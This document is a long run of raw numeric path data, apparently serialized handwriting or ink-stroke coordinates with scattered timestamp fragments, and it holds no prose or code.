0,-31 1 0,-19 15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48:55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6 24575,'-24'0'0,"1"0"0,0 0 0,5 0 0,-8 0 0,18-5 0,-17 4 0,22 1 0,-7 11 0,10 1 0,0 3 0,-5 1 0,4-4 0,-14 3 0,12-4 0,-7 0 0,10 0 0,4-5 0,7 3 0,1-3 0,9 5 0,7 6 0,2 0 0,10 1 0,-12 3 0,-1-10 0,-5 0 0,-1-1 0,-4-4 0,-2 4 0,-4 1 0,-5 0 0,-2-1 0,-4 1 0,0 0 0,0-1 0,0 1 0,0 5 0,-10-4 0,-3 9 0,-10-3 0,-34 16 0,2-7 0,-35 8 0,17-21 0,23-3 0,18-11 0,28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48:5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24575,'0'10'0,"0"13"0,0 13 0,0-8 0,0 17 0,0-9 0,0-8 0,0 11 0,0-10 0,0-3 0,0 8 0,0-12 0,0 1 0,0-6 0,0-1 0,0-5 0,0 0 0,0 4 0,0-3 0,0 4 0,0-6 0,0 1 0,0 0 0,0 4 0,0-3 0,0 3 0,0-4 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-10 0,0-7 0,0-6 0,0-4 0,4 6 0,2-6 0,5 4 0,0-4 0,-5 6 0,3-1 0,2-11 0,6 4 0,0-9 0,-1 10 0,-6-8 0,-4 12 0,4-13 0,-4 14 0,4-8 0,1 8 0,4-4 0,2 1 0,0 8 0,-2-3 0,5 10 0,-7 0 0,8 0 0,-11 0 0,1 0 0,0 0 0,-1 0 0,-4 5 0,4 1 0,-9 4 0,4 1 0,-5 0 0,5-1 0,-4 6 0,4-4 0,-5 3 0,0-4 0,0 0 0,0-1 0,0 1 0,0 0 0,0 4 0,4-3 0,-3 8 0,4-8 0,0 14 0,-4-13 0,4 8 0,0 4 0,-4-6 0,8 2 0,-7-6 0,2-9 0,-4 4 0,5 1 0,-4 0 0,4-1 0,0 1 0,-4 0 0,4-1 0,-5 1 0,0-5 0,0-1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49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3747 24575,'30'-18'0,"8"-7"0,9 4 0,1 3 0,22-7 0,-8 9 0,29-17 0,-8 1 0,10 4 0,-7-4 0,-16 6 0,-2 0 0,2 0 0,-18 1 0,5-1 0,28-6 0,-1 2 0,9-8 0,-5 4 0,2 0 0,-38 14 0,-2-2 0,14-13 0,3-3 0,-4 8 0,1-2 0,10-10 0,-6 1 0,0-6 0,-14 15 0,4-1 0,6-2 0,3-2 0,11-3 0,1-1 0,3-1 0,-1 1 0,-12 7 0,-2 1 0,-7 2 0,-1 0 0,1 3 0,8-2 0,0 1 0,13-4 0,0-1 0,-9 4 0,10-3 0,-1-1-716,10-3 0,9-4 0,-15 8 716,-28 13 0,-7 3 0,44-17 0,-35 15 0,0 0 0,28-16 0,-5 3 0,3-1 0,-32 9 0,2 0 0,14-5 0,8-3 0,-7 3 0,-12 5 0,-2 1 0,29-12 0,-2 2 0,6 1 0,-37 11 0,2 0 0,-2 0 0,2 0 0,11-4 0,5-1 0,21-9 0,1 1 0,-22 10 0,-2 1 1074,0 0 0,-3 2-1074,21-5 0,-32 11 0,4-1 0,31-11 0,1-1 0,-27 8 0,-1 0 0,11 0 0,-4 0 0,11-11 0,-19 14 0,15-14 0,-37 16 0,6-4 0,-3 2 0,-10-2 0,20-6 0,-11 6 0,19-14 0,-5 8 0,2-2 0,-14 3 0,1-1 0,21-9 0,2 1 0,-12 7 0,-3 1 0,-4 5 0,0 0 0,9-5 0,2 0 0,5-1 0,-2 2 0,31-11 0,-31 9 0,-5 2 0,-6 8 0,18-15 0,-30 17 0,23-11 0,-4 6 0,18-7 0,6 1 0,-11 5 0,3-4 0,-25 11 0,-3-4 0,-23 11 0,13-8 0,0 1 0,10-4 0,5 0 0,-4 6 0,-6-6 0,-2 4 0,-11-3 0,-1 10 0,-10-4 0,-2 4 0,-4 0 0,0-4 0,4 4 0,-3-4 0,8-1 0,-3 0 0,-5 0 0,2 5 0,-8 1 0,0 5 0,-1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5T14:40:14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24575,'58'-12'0,"-13"3"0,8-5 0,-8 2 0,18-7 0,-5 8 0,5-6 0,-1 11 0,-16 5 0,-3-5 0,-16 6 0,-6 0 0,-13 0 0,7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49:15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24575,'53'0'0,"-12"0"0,19 6 0,-11 11 0,-2 4 0,5 5 0,-3-1 0,1 1 0,7 5 0,-6-4 0,4-6 0,-9 1 0,-13-14 0,12 4 0,-21-7 0,-3 0 0,-10 1 0,-1 0 0,6 8 0,-4-11 0,3 11 0,-4-13 0,-5 8 0,3-7 0,-7 12 0,2-2 0,-72 54 0,0-5 0,7-10 0,-2-1 0,-15 9 0,20-14 0,17-22 0,11-6 0,6 0 0,10-6 0,14-6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48:22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24575,'38'0'0,"15"0"0,40 0 0,-13 0 0,15 0 0,0 0 0,-12 0 0,-2 0 0,4 0-1528,-5 0 1,4 0 0,-1 0 0,-5 0 1527,0 0 0,-5 0 0,0 0 0,6 0 0,0 0 0,-5 0-148,5 0 1,0 0 147,-10 0 0,3 0 0,-3 0 684,12 0 1,-3 0-685,-2 0 0,2 0 0,12 0 0,-3 0 0,-27 0 0,-2 0 0,19 0 0,-5 0 0,-5 0 0,-11 0 0,0 0 0,8 0 2992,-9 0-2992,7 0 2023,-26 0-2023,10 0 0,-33 0 0,-4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48:23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24575,'0'29'0,"0"13"0,0 22 0,0-16 0,6 43 0,1-37 0,1 26 0,4-2 0,-11-27 0,5 4 0,-1 7 0,-3-31 0,3 18 0,-5-28 0,0-13 0,0 1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48:24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0 24575,'-11'0'0,"-5"5"0,-7 12 0,3 2 0,-14-1 0,4 13 0,-14-10 0,8 9 0,1-8 0,7-5 0,3-10 0,18 3 0,9-5 0,45 13 0,-12 3 0,19 9 0,2 13 0,-14-13 0,15 19 0,-19-22 0,5 21 0,-10-20 0,1 7 0,-6-8 0,-9-13 0,7 12 0,-14-14 0,-1-2 0,-6-5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48:27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290 559 24575,'-17'0'0,"-4"0"0,4 0 0,-6 0 0,6 0 0,-10 0 0,14 0 0,-14 0 0,15 0 0,-5 0 0,7 0 0,-1 0 0,0 0 0,0 5 0,-5 11 0,8 8 0,-7 10 0,9 0 0,0-6 0,1-1 0,5-5 0,0-6 0,5 14 0,1-16 0,5 11 0,10-9 0,-8-9 0,8 8 0,-10-14 0,-1 4 0,6-5 0,-4 0 0,13 0 0,-12 0 0,7-5 0,-14-1 0,3-14 0,-7 7 0,2-8 0,1 15 0,-4-4 0,9 9 0,-4-4 0,4 5 0,1 0 0,5 21 0,-3-5 0,4 17 0,0 7 0,1-13 0,1 20 0,3-23 0,1 21 0,6-13 0,-1 6 0,9-11 0,-18-15 0,6-2 0,-14-10 0,17-59 0,-6 20 0,-2-22 0,-1-8 0,-4 13 0,-2-1 0,-1-15 0,-2-3 0,-1 3 0,-3-1 0,-2-6 0,-2 6 0,-2-12 0,0 27 0,0 8 0,0 21 0,0-20 0,0 20 0,0 0 0,0 7 0,-4 6 0,-2 10 0,-5 1 0,0 5 0,-5 5 0,9 7 0,-8 5 0,14 13 0,-9 11 0,3 0 0,0 7 0,-4-11 0,9 11 0,-3 30 0,5-27 0,0 15 0,0-32 0,0-8 0,0 14 0,5 1 0,2-1 0,6 8 0,10 17 0,-3-2 0,-1-5 0,-4-17 0,-14-30 0,9-5 0,-4-1 0,4-5 0,1 0 0,0 0 0,19 0 0,-14 0 0,34 0 0,-34 0 0,14 5 0,-19-4 0,-5 3 0,-1-4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48:28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24575,'0'16'0,"0"2"0,0 10 0,0 3 0,0-2 0,0 18 0,0-20 0,0 13 0,0-17 0,0 5 0,0-9 0,0 2 0,0-6 0,0-3 0,0-1 0,0-6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48:29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49:17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0 24575,'-11'0'0,"0"5"0,-10 6 0,8 1 0,-14 4 0,4 6 0,-2-3 0,2 9 0,1 7 0,-1-4 0,8 15 0,-11-4 0,19-11 0,-9 21 0,-2 0 0,-2 21 0,-6 16 0,1-18 0,5-8 0,3-23 0,11-13 0,1-11 0,1-5 0,2-1 0,-7-9 0,8 8 0,-14-3 0,3 10 0,-10-4 0,5 4 0,-16 5 0,13 3 0,-13 5 0,16-2 0,23-15 0,17-3 0,24-9 0,7 0 0,32 0 0,8 0 0,-37 5 0,3 2 0,3-3 0,-2 1 0,-6 7 0,0 1 0,0-3 0,-2 1 0,22 9 0,-3 4 0,-32-5 0,18 11 0,-3 6 0,-5 0 0,0-1 0,-21-8 0,3-5 0,12 5 0,-1-3 0,9-7 0,-11-1 0,11-11 0,0-2 0,-15 4 0,45-1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4:50:30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3163 24575,'54'-28'0,"0"-10"0,-8 25 0,7 0 0,25-24 0,3-2 0,-12 17 0,2 1-523,-7-5 0,4-3 0,1 2 523,6 3 0,1 1 0,-3 1-1457,17-8 1,1-1 1456,-15 6 0,3-2 0,1 1 0,-3 2 0,1 0 0,1 2-78,4 0 1,1 0-1,2-1 78,-10 2 0,3-1 0,0-1 0,1 2 0,3 1 0,1 2 0,0 0 0,0-1-410,-2-1 1,-1 0 0,1 0 0,2 0 409,4 1 0,1 1 0,3 0 0,3-2 0,-17 3 0,4-2 0,2 0 0,0-1 0,-1 0 0,-2 1 0,7-2 0,-2 1 0,-1 0 0,2-1 0,4-2-335,0-1 1,3-2 0,3 0 0,0-1 0,-2 0 0,-3 2 334,3-1 0,-3 1 0,-1 0 0,-1 0 0,1 1 0,2 0 0,1 0 0,-1 1 0,-2-1 0,-3 2 474,4-2 0,-4 0 1,-2 1-1,-5 3-474,5 1 0,-4 2 0,-9-2 0,1-9 0,-12-2 793,18-17-793,-6-7 0,2-5 0,1 12 0,1-1 0,-36 18 0,4-3 0,13-6 0,13-6 0,3-2 0,-7 6 0,19-10 0,-1 2 0,-10 6 0,5-3 0,-2 4 0,-8 8 0,-2 2 0,-3 3 0,11-2 0,-3 1 858,0 1 0,2-3-858,-14 2 0,2-2 0,-5 3 0,-1 3 0,-2 1 1758,24-16 1,-2 0-1759,-21 11 0,-3 2 0,2 2 0,-1 2 0,-8-2 0,-1 3 0,42-3 0,-46 7 434,14 7-434,-31 5 0,2 2 0,-17 5 0,-5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5T14:40:16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5 24575,'-21'0'0,"-25"0"0,11 0 0,-14 0 0,25 0 0,7 0 0,-5 0 0,10 0 0,-3 0 0,4 0 0,0 0 0,0-5 0,5 15 0,1-8 0,5 51 0,0-33 0,0 32 0,0-24 0,0 3 0,0 3 0,0-7 0,0-11 0,0 0 0,5-10 0,7 4 0,10 1 0,13 7 0,-5-1 0,40 0 0,-39-10 0,22-2 0,-38-5 0,1 0 0,0 0 0,2-16 0,-8-8 0,-5-17 0,-5-6 0,0 12 0,0 7 0,0 12 0,5 15 0,7 18 0,0 3 0,5 20 0,17 18 0,-16-13 0,20 18 0,-25-33 0,8-2 0,-9-11 0,4-6 0,-6-7 0,1-4 0,0 0 0,-1 0 0,1 0 0,0-4 0,-5-2 0,-2-5 0,-4 5 0,0 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5T14:41:53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24575,'23'0'0,"-7"0"0,1 0 0,-7 0 0,1 0 0,0 0 0,10 0 0,-8 0 0,18 0 0,-7 0 0,10 0 0,-11 0 0,19 0 0,-16 0 0,8 0 0,16 19 0,-32-14 0,22 18 0,-24-17 0,1 5 0,4-5 0,0-1 0,1-5 0,5 0 0,-4 0 0,15-16 0,-13 3 0,2-10 0,-11 12 0,-6 6 0,6 0 0,0 4 0,6-4 0,-1 5 0,6 0 0,-4 5 0,20 11 0,14 14 0,-1-5 0,15 6 0,-35-18 0,-4-3 0,-16-5 0,-1-5 0,-3 0 0,9 0 0,1 0 0,2 0 0,8-5 0,-9-1 0,4 0 0,5 1 0,-8 5 0,3 0 0,-2 0 0,-8 0 0,5 0 0,-7 0 0,1 0 0,0 0 0,6 0 0,9-10 0,-11 3 0,16-9 0,-13 5 0,5-1 0,-7 6 0,15 2 0,-4 4 0,13 0 0,-10 5 0,3 11 0,-13-2 0,17 16 0,-17-16 0,2 2 0,-7-11 0,-3-5 0,4 0 0,1 0 0,-5 0 0,4 0 0,-4-10 0,0 3 0,-2-9 0,-9 5 0,8 0 0,8-4 0,1 3 0,8 1 0,-14 6 0,-2 0 0,-4 4 0,0-4 0,-1 5 0,11-5 0,-8 4 0,7-4 0,-9 5 0,4-4 0,-3 2 0,13-2 0,-12 4 0,7 0 0,-9 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-5 0 0,-1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5T14:39:37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24575,'30'0'0,"42"0"0,-24 0 0,30 0 0,-16 0 0,-19 0 0,12 0 0,-19 0 0,-4 0 0,5 0 0,6 0 0,14 0 0,-21 0 0,10 0 0,-39 0 0,3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5T14:39:38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24575,'33'0'0,"-5"0"0,27 0 0,9 0 0,11 0 0,-8 0 0,-5 0 0,9 0 0,-16 0 0,4 0 0,6 0 0,-2 0 0,-9 0 0,-4 0 0,17 0 0,-50 0 0,-1 0 0,-5 0 0,-6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5T14:42:30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24575,'10'0'0,"27"0"0,-14 0 0,21 0 0,2 0 0,-17 0 0,31 0 0,-17 0 0,15 0 0,12 0 0,-17 0 0,9 0 0,-14 0 0,1 0 0,-6 0 0,25 0 0,-30 0 0,20 0 0,-18 0 0,6 0 0,-7 0 0,10 0 0,-20 0 0,5 0 0,-5 0 0,3 0 0,-14 0 0,12 0 0,-17 0 0,7 0 0,-9 0 0,0 0 0,-1 0 0,1 0 0,-5 0 0,-1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3:36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2035 24575,'0'-77'0,"0"-7"0,0 27 0,0 7 0,0 0 0,0-14 0,3-2 0,2-1 0,4-17 0,0 13 0,3-2 0,0 15 0,-1 2 0,-4 2 0,1 0 0,14-23 0,1 1 0,-9-21 0,8 20 0,1-1 0,-11 22 0,-3 3 0,2-2 0,-1 0 0,1 0 0,-2 1 0,4-38 0,-5 16 0,2 15 0,-4 14 0,1 18 0,-3 9 0,1 14 0,1 1 0,5 5 0,4 5 0,-2 6 0,3 13 0,9 47 0,-4-24 0,-4 7 0,1 2 0,10 6 0,1 20 0,-1-7 0,0 5 0,-7-18 0,0 2 0,2 1 0,2 5 0,-2-6 0,-3-5 0,-2-6 0,16 41 0,-14-40 0,-7-7 0,1 3 0,2 2 0,6 10 0,-7-13 0,0-2 0,1-1 0,-10-18 0,-1-5 0,-5-8 0,0-4 0,0-1 0,0 1 0,0 4 0,0-3 0,0 4 0,0-5 0,0-1 0,0 1 0,0 15 0,5-6 0,-3 19 0,8 2 0,-4 3 0,1-1 0,-2-15 0,0-7 0,-4-5 0,4-4 0,-5-2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3:37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0 136 24575,'18'0'0,"4"0"0,-5 0 0,17 0 0,-14 0 0,12 0 0,0 0 0,-5 0 0,17 0 0,-20 0 0,12-6 0,-18 5 0,15-10 0,-8 10 0,-1-4 0,4-6 0,-10 9 0,5-9 0,5 6 0,-9 4 0,7-14 0,-14 13 0,4-9 0,-5 11 0,4-5 0,-3 4 0,8-4 0,-8 1 0,4 2 0,-6-3 0,-4 1 0,9 2 0,-8-2 0,13 4 0,-8-5 0,3 4 0,1-4 0,-4 5 0,3 0 0,-9-5 0,-1 4 0,-5-4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3:40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24575,'0'21'0,"0"-8"0,0 14 0,0-10 0,0 12 0,0 10 0,0-11 0,0 9 0,0-20 0,0 1 0,0 19 0,0-21 0,0 35 0,0-35 0,0 14 0,0-24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5T14:37:30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134 139 24575,'57'0'0,"6"0"0,-19 0 0,-3-5 0,5-2 0,-11-5 0,-8 6 0,-1 0 0,-15 6 0,0 0 0,-10-4 0,-8-3 0,0-9 0,-14 3 0,3-9 0,-1 9 0,-12 2 0,7 1 0,0 9 0,-3-4 0,10 5 0,-7 0 0,1 0 0,0 0 0,-11 0 0,-2 10 0,-1-2 0,-1 13 0,19-8 0,-2 2 0,9 2 0,1-5 0,0 14 0,5 29 0,1-18 0,5 28 0,0-35 0,0 0 0,0-3 0,14 0 0,4-4 0,20 9 0,-7-13 0,6 6 0,-8-7 0,5 4 0,0 1 0,-10-6 0,2-1 0,7 5 0,-1-7 0,12 2 0,-10-10 0,-1-6 0,-4 0 0,-2 0 0,4 0 0,-8 0 0,4 0 0,-17 0 0,-5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3:42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 24575,'-23'18'0,"10"-2"0,-2-9 0,14 2 0,-9-8 0,9 9 0,-14-9 0,2 9 0,0-4 0,-2 4 0,9 1 0,-15 0 0,8-1 0,-7 1 0,9-5 0,5 3 0,-4-7 0,9 7 0,-4-3 0,0 0 0,9 4 0,7 6 0,8 3 0,9 9 0,6 0 0,2 7 0,5 1 0,-7-2 0,-7-7 0,-5-5 0,-6-11 0,0 4 0,-1-9 0,2 4 0,-1 1 0,0 0 0,-5-1 0,-1 1 0,-4 5 0,-1-9 0,-5 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3:44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24575,'0'37'0,"0"-4"0,0 19 0,0 6 0,0 20 0,3-10 0,1 6 0,4-1 0,0-1 0,0-6 0,2 2 0,5 9 0,1 3 0,-4 13 0,2-1 0,4-21 0,1 1 0,-3 24 0,1 0 0,4-20 0,0-5 0,-4-16 0,-1-3 0,7 25 0,-8-41 0,-10-24 0,-4-1 0,4-7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3:46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1 531 24575,'0'-16'0,"5"-2"0,30-45 0,-3 14 0,-5 9 0,3-2 0,30-27 0,-21 29 0,17-16 0,-8 24 0,-1-12 0,19 11 0,-18 11 0,10 16 0,-21 6 0,-4 0 0,3 0 0,-16 0 0,12 21 0,-21 0 0,-6 38 0,-5-10 0,0 1 0,0 4 0,0 27 0,-9-7 0,-6 6 0,-4-8 0,-3-2 0,1-2 0,-2-2 0,-4-4 0,1-7 0,-5 0 0,1-4 0,3-21 0,4 3 0,6-22 0,12-11 0,6-13 0,40-30 0,-9 8 0,20-7 0,3 1 0,-3-1 0,-5 9 0,2 1 0,14-5 0,-12 14 0,21-13 0,-38 28 0,22-8 0,-18 14 0,31-3 0,-28 5 0,24 0 0,-33 0 0,12 9 0,-15 15 0,-1 6 0,-11 15 0,-5 2 0,-7 7 0,-5 14 0,0-6 0,0 12 0,-6 3 0,-6-16 0,-14 17 0,-6-19 0,8-13 0,-1 0 0,-9 10 0,-13 24 0,11-36 0,-6 10 0,5-17 0,-12 6 0,11-23 0,-40 18 0,24-18 0,-15-4 0,33-10 0,-10-6 0,-3 5 0,-1-4 0,6 4 0,26 0 0,9-4 0,9 4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3:48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24575,'0'23'0,"0"-4"0,0 34 0,0-24 0,0 17 0,0 0 0,0-22 0,0 15 0,0-23 0,0 1 0,0 0 0,0-1 0,0-5 0,0 0 0,0-1 0,0-4 0,0-1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3:50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1 24575,'-11'0'0,"0"0"0,0 4 0,5 2 0,-3 0 0,3 4 0,-5-4 0,0 0 0,0-2 0,0 1 0,0-4 0,1 4 0,-12 0 0,9-3 0,-13 7 0,8-2 0,1-1 0,-4 4 0,9-4 0,-3 0 0,-1 3 0,4-8 0,1 9 0,11-9 0,11 13 0,1-7 0,9 9 0,1 5 0,13 9 0,-5 0 0,4-1 0,-6-2 0,0-4 0,-4 1 0,1 1 0,-13-13 0,4 3 0,-6-9 0,1-1 0,0-5 0,-1 5 0,-4 1 0,-1 4 0,-5-4 0,0-1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3:57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0 428 24575,'35'0'0,"33"-19"0,12-4 0,-14 14 0,5-1-843,8-10 1,9-6 0,0 1 842,-1 5 0,0 0 0,1 2-1525,-1 3 0,1 0 0,4-2 1525,-13-1 0,3-3 0,2 1 0,4 4 0,-2 7 0,3 4 0,3 1 0,1 0 0,-1-2-278,0-4 1,-1-1 0,1 0 0,2 0-1,4 2 278,-14 5 0,3 0 0,3 2 0,0 1 0,2-1 0,1 1 0,0-1 0,-6-1 0,2 0 0,2 0 0,0 0 0,0 1 0,-2-1 0,-1 1 0,-3 1 0,12 1 0,-3 1 0,-2 1 0,-1 0 0,0 0 0,0 0-519,-1 1 0,1 0 1,0 0-1,-3 0 1,-3 1-1,-6 0 519,1 0 0,-7 0 0,-1 2 0,6 2 0,10 4 0,6 5 0,2 1 0,-2-1 0,-9-2-554,8-2 0,-8-2 0,7 2 554,-4 0 0,11 3 0,1 0 0,-6-1 0,-14-3 650,14 1 0,-11-3-650,-1-3 0,-4-3 0,-16 0 0,0-1 890,24-2 1,5-2-891,-22 1 0,1-1 0,3 2 0,16 3 0,3 1 0,2 2 698,-21-2 1,0 1 0,2 1 0,5 3-699,5 3 0,7 4 0,2 1 0,-2 0 0,-7-2 0,-8-1 0,-6-2 0,0 0 0,9 3 0,5 0 0,11 3 0,4 1 0,-1 0 0,-7-2 0,-13-3 1371,-4-2 0,-10-2 0,3 0-1371,26 5 0,5 1 0,-10-5 0,-4-7 0,-13-3 602,8-2-602,-2 0 0,6 0 0,-10 0 0,6 0 0,8 0 0,9 0 0,-2 0 0,-18 0 0,-2 0 0,3 0 0,-5 0 0,4 0 0,0 0 0,-4 0 0,2 0 0,-4 0 0,1 0 0,6 0 0,0 0 0,0 0 0,4 0 0,0 0 0,-1 0 0,-2 0 0,-2 0 0,-1 0 223,24 0 0,-4 0-223,-14 0 0,-5 0 0,-16 0 0,-4 0 1135,39 0-1135,-42 0 0,-1 0 0,28 0 0,-13 0 0,3 0 0,-15 0 0,0 0 532,11 0 1,2 0-533,0 0 0,3 0 0,24 6 0,0 1 0,-16-5 0,-2-1-497,8 6 0,-4-1 497,-30-6 0,-1 0 0,10 0 0,1 0 0,1 0 0,1 0 0,8 0 0,-2 0-248,-19-1 1,-1-4 247,45-18 0,-33-7 0,22-22 0,-22 26 0,10 1 0,13 25 0,-34-1 0,2 2 0,1 1 0,5 3 0,38 6 0,2 3 0,-29 0 0,5 1 0,0-2 0,11 2 0,1 1 0,-9-2 0,13 4 0,-3 0 0,-2-2 0,5 0 0,-8-1 0,-2 0 0,-8-1 0,-11-6 0,-3 0 0,39 4 0,-35-12 0,6 0 993,-9 0-993,40 0 0,-45 0 0,-2 0 0,23 0 522,9 0-522,-66 0 0,17 0 0,-13 0 0,6 0 0,-2 0 0,4 0 0,-11 0 0,5 0 0,-4 0 0,9 0 0,5 0 0,-1 0 0,-2 0 0,-9 0 0,9-5 0,-3-1 0,4-10 0,-10 9 0,2-8 0,-8 9 0,-1 0 0,-5 1 0,-6 5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4:06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1 486 24575,'0'33'0,"0"-11"0,0 24 0,0 20 0,0-13 0,0 24 0,0-38 0,0-12 0,0-11 0,0-15 0,0-2 0,0-26 0,0 7 0,0-14 0,0-6 0,0-10 0,0-13 0,0-5 0,0 14 0,0 6 0,0 14 0,0-3 0,0 7 0,0-20 0,0 18 0,0-5 0,0 14 0,0 6 0,4 7 0,7 14 0,1 3 0,4 15 0,-5-5 0,11 17 0,-3 2 0,10 10 0,-1-5 0,-4-1 0,-1-11 0,-7-2 0,-11-11 0,5-5 0,-9-2 0,9-7 0,-4 2 0,0-8 0,3-29 0,-7 10 0,8-27 0,-8 18 0,3-16 0,1 4 0,-5-24 0,9 23 0,-9-4 0,8 16 0,-7 15 0,8-9 0,-9 15 0,4-5 0,0 6 0,-4 1 0,8 4 0,-3 1 0,5 5 0,5 0 0,-5 5 0,0 1 0,3 9 0,-6-3 0,7 9 0,-4-9 0,6 20 0,0-7 0,1 14 0,3 1 0,-2 1 0,3 0 0,-4-2 0,3 5 0,-8-18 0,3 16 0,-10-29 0,3 14 0,-3-10 0,1 0 0,2 3 0,-7-3 0,7 4 0,-8 1 0,9-1 0,-9-4 0,4-7 0,-5-5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4:23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1 24575,'-30'0'0,"-1"5"0,-25 26 0,11 7 0,-12 16 0,2 11 0,-1-2 0,13 3 0,1-20 0,35-14 0,-4-14 0,11 10 0,0 1 0,21 11 0,11-4 0,36 11 0,-4-4 0,4 1 0,-26-3 0,-9-7 0,-20 17 0,-3-12 0,-19 15 0,-8 2 0,-9 5 0,-15 16 0,-7 3 0,16-32 0,-1-2 0,-12 17 0,1-2 0,-3 12 0,21-25 0,16-26 0,15-11 0,6-7 0,7 2 0,22 0 0,-3 10 0,4-3 0,-19 7 0,-12-8 0,-10 14 0,0 9 0,0 41 0,0-14 0,0 7 0,0-15 0,0-19 0,5 10 0,7-5 0,1 13 0,-2-13 0,-6 17 0,-5-22 0,0 14 0,0 9 0,0-3 0,0-10 0,0-18 0,5-16 0,-4-6 0,4-5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4:24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24575,'0'35'0,"0"4"0,0 3 0,0-8 0,0 12 0,0 2 0,0-6 0,0 19 0,0-17 0,0 1 0,0-3 0,0-11 0,0 9 0,0 10 0,0-4 0,0 26 0,0-36 0,0 17 0,0-28 0,0 16 0,0-11 0,0 0 0,10-15 0,27-10 0,-8-5 0,32 0 0,-21-6 0,14-2 0,0-5 0,32-7 0,0-1 0,-32 7 0,0 1 0,38-8 0,-23 3 0,-20 11 0,-17-3 0,-20 9 0,-3-4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4:25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0 210 24575,'30'-5'0,"22"-12"0,4-5 0,0-4 0,5 4 0,0-1 0,2-8 0,-12 21 0,11-13 0,-21 11 0,-9 4 0,2-3 0,-6 11 0,-9 0 0,2 0 0,-16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5T14:37:31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24575,'42'0'0,"-9"10"0,27 21 0,-17 7 0,11 16 0,-24-24 0,-3-3 0,-11-21 0,-8 3 0,7-7 0,-9 2 0,9-4 0,6 19 0,12-4 0,-10 11 0,2-15 0,-19-2 0,4-8 0,0 9 0,2-9 0,13 8 0,-16-7 0,5 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4:26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1 291 24575,'29'-11'0,"3"-3"0,4-10 0,1 4 0,-1-3 0,18 4 0,-8-11 0,9 9 0,-13-1 0,-1 5 0,2-2 0,-7 6 0,2-3 0,-19 15 0,12-9 0,-18 8 0,9-13 0,-7 12 0,-2-7 0,2 10 0,1 0 0,-5 0 0,0 0 0,-6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4:40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730 13 24575,'-11'0'0,"0"0"0,-5 0 0,-7 0 0,-8-6 0,7 5 0,-16-5 0,20 6 0,-21 0 0,11 0 0,-11 0 0,0 0 0,-11 0 0,15 0 0,-6 0 0,24 5 0,-16 16 0,20-7 0,-16 21 0,24-22 0,-3 17 0,10-17 0,0 12 0,0-3 0,0 12 0,0 3 0,0-2 0,16 25 0,-2-14 0,9 12 0,-2-15 0,-13-25 0,6-2 0,-3-12 0,1-4 0,3 0 0,1 0 0,-4 0 0,3 0 0,0 0 0,-3 0 0,4 0 0,-6 0 0,1 0 0,-24 0 0,8 5 0,-31-4 0,17 4 0,-9-5 0,-5 5 0,2 1 0,-9 5 0,6 0 0,5 0 0,7 4 0,6-3 0,6-1 0,-1 3 0,-5-2 0,4 14 0,-4-8 0,6 17 0,4-10 0,1 8 0,5 3 0,0-12 0,0 7 0,5-4 0,6-4 0,6 9 0,10-9 0,-8 0 0,7-7 0,-4-5 0,1 0 0,3-5 0,-9-1 0,-2-5 0,1 0 0,-4 0 0,3 0 0,1 0 0,-4 0 0,8 0 0,-8 0 0,13 0 0,-8 0 0,10 0 0,-6 0 0,0 0 0,1-5 0,-1-1 0,1-5 0,-6 5 0,0-4 0,4 4 0,-7 0 0,12-3 0,-9 3 0,1-5 0,3 0 0,-3 5 0,0-4 0,8 4 0,-12 0 0,7-3 0,-14 8 0,-1-4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4:42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24575,'0'23'0,"0"0"0,0-6 0,0 4 0,0-4 0,0 0 0,0 5 0,0-5 0,0 7 0,0-7 0,0 4 0,0-9 0,0 3 0,0 10 0,0-6 0,0 12 0,0-9 0,0-6 0,0 0 0,0-5 0,0-1 0,5-4 0,-4-1 0,4-5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4:4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0 24575,'-11'0'0,"1"10"0,-1-8 0,0 13 0,-5-4 0,9 1 0,-8 4 0,9-10 0,0 4 0,-4-4 0,-2 5 0,0 0 0,-10 0 0,15 0 0,-14 1 0,9 3 0,-6-7 0,3 6 0,13-13 0,4 4 0,8-5 0,1 0 0,0 0 0,19 19 0,-4-9 0,12 20 0,-11-13 0,5 4 0,-13-4 0,16-2 0,-22-4 0,17-1 0,-17 1 0,17 0 0,-7 0 0,5-1 0,-1-4 0,-6-1 0,6-5 0,-14 0 0,2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4:45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0 24575,'-24'30'0,"10"-6"0,-8 29 0,14-1 0,-11 7 0,7-5 0,-1 1 0,-12 17 0,4 8 0,1-22 0,1-2 0,4 3 0,1 6 0,4-2 0,9-20 0,-5 56 0,6-42 0,0 10 0,0-16 0,0-2 0,0-26 0,10 4 0,-3-5 0,13-1 0,-8-4 0,4-2 0,5 1 0,8 1 0,11 11 0,-10-10 0,1 3 0,-24-10 0,2-5 0,-9-2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4:47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0 495 24575,'0'49'0,"0"11"0,0-19 0,0 4 0,0-21 0,0-9 0,0-14 0,0-12 0,0-31 0,0 1 0,0-13 0,0-8 0,0 18 0,0-11 0,0 19 0,0 4 0,0 1 0,0-4 0,0 1 0,5 4 0,15-13 0,-6 24 0,11-1 0,-14 15 0,0 5 0,9 0 0,-7 4 0,7 2 0,-4 15 0,-4-2 0,4 4 0,1 9 0,-5-12 0,5 13 0,-1-5 0,-8-9 0,7 2 0,-9-5 0,0-4 0,3 3 0,-3-9 0,5-1 0,-1-16 0,-4-2 0,4-4 0,-4-16 0,0 7 0,5-10 0,-10-14 0,9 21 0,-8-30 0,7 38 0,-7-17 0,7 21 0,-8 0 0,4 1 0,0 5 0,1 1 0,4 4 0,1 1 0,9 5 0,-2 4 0,4 8 0,-6 6 0,6 22 0,-7-7 0,13 15 0,-3 7 0,1-3 0,4 15 0,-6-13 0,-6-6 0,-1-3 0,-6-20 0,-4 7 0,2-15 0,-8 9 0,4-8 0,0-2 0,-4-12 0,4-4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4:48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24575,'6'36'0,"12"15"0,11 7 0,4 6 0,-2-12 0,0 1 0,4 30-583,-7-22 0,1 1 583,7 21 0,-11 7 0,-1-30 0,-1 0 0,-4 17 21,-2-15 0,2 10 0,-2-5-21,-4-6 0,-2-1 0,10 32 0,-2 3 0,-8-18 0,0-4 0,2-16 0,-1-2 0,-4-4 0,-1-3 0,12 23 0,-11-6 871,-3-28-871,-5 17 232,0-35-232,0 6 0,0-14 0,0 0 0,0-6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4:49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24575,'17'0'0,"21"0"0,-10 0 0,16 0 0,-22 0 0,-4 0 0,3 0 0,-9 0 0,4 0 0,0 0 0,-5 0 0,5 0 0,-1 0 0,-3 0 0,4 0 